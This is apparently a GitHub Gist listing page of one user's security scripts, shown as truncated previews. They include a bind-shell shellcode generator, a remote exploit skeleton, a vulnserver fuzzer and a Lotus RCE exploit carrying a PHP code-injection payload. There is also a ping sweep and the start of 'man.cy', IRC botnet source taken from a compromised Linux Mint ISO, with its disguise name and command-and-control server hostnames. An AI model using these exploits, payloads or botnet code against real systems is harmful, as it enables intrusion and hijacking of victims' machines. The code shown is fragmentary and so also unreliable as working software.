This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Copyright (c) 2019 - Paolo Perego - paolo@armoredcode.com | |
| Permission is hereby granted, free of charge, to any person | |
| obtaining a copy of this software and associated documentation | |
| files (the "Software"), to deal in the Software without | |
| restriction, including without limitation the rights to use, | |
| copy, modify, merge, publish, distribute, sublicense, and/or sell | |
| copies of the Software, and to permit persons to whom the | |
| Software is furnished to do so, subject to the following | |
| conditions: |
thesp0nge
/ generate.py
Created
April 19, 2019 12:33
bind shell shellcode encoded with SUB EAX technique
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # Please install shellerate>=0.4.2 before: pip install shellerate | |
| import sys | |
| import string | |
| import logging | |
| import secrets | |
| from shellerate import strings; | |
| from shellerate import asm_x86; | |
| from shellerate.bind_shellcode import BindShellcode; |
thesp0nge
/ remote_exploit_skeleton.py
Last active
March 15, 2019 11:18
A Skeleton for my remote exploit stuff
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import sys | |
| import socket | |
| def exploit(target, port): | |
| s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| s.connect((target, port)) | |
| data=s.recv(1024) |
thesp0nge
/ vulnserver_fuzzer.py
Last active
February 15, 2019 16:18
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #/usr/bin/env python | |
| import socket | |
| import os | |
| import sys | |
| import select | |
| import string | |
| import random | |
| COMMANDS = ["STATS", "RTIME", "LTIME", "SRUN", "TRUN", "GMON", "GDOG", "KSTET", "GTER", "HTER", "LTER", "KSTAN"] |
thesp0nge
/ lotus_rce_exploit.py
Created
September 20, 2017 11:28
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import sys, socket, requests, urllib | |
| if len(sys.argv) < 2: | |
| print "\nUsage: " + sys.argv[0] + " <HOST>\n" | |
| sys.exit() | |
| uri="/index.php" | |
| canary=urllib.urlencode({"page":"index');${print('THIS_IS_RANDOM_FOO')};#"}) |
thesp0nge
/ thepinger.sh
Created
July 27, 2017 12:32
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| PING=`which ping` | |
| SUBNET="192.168.10." | |
| for i in `seq 254`; do $PING -c 1 -W 1 $SUBNET$i | grep 'from' | cut -d' ' -f 4 | tr -d ':'; done |
thesp0nge
/ Kali owasp_zap bin modified
Last active
September 7, 2016 12:15
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| #for kali rolling, the startup script is very simple | |
| cd /usr/share/zaproxy/ | |
| exec ./zap.sh $@ |
thesp0nge
/ w_gli_hacker.c
Created
May 12, 2016 12:47
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| int test(char *s) { | |
| printf("%s\n", s); | |
| } | |
| int main(int argc, char **argv) { | |
| char *s; | |
| test("pippo"); | |
| } |
thesp0nge
/ man.cy
Created
February 21, 2016 22:19
— forked from kurobeats/man.cy
man.cy from malicious Linux Mint iso
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define STARTUP 1 | |
| #undef IDENT // Only enable this if you absolutely have to | |
| #define FAKENAME "apt-cache" // What you want this to hide as | |
| #define CHAN "#mint" // Channel to join | |
| #define KEY "bleh" // The key of the channel | |
| int numservers=5; // Must change this to equal number of servers down there | |
| char *servers[] = { | |
| "updates.absentvodka.com", | |
| "updates.mintylinux.com", | |
| "eggstrawdinarry.mylittlerepo.com", |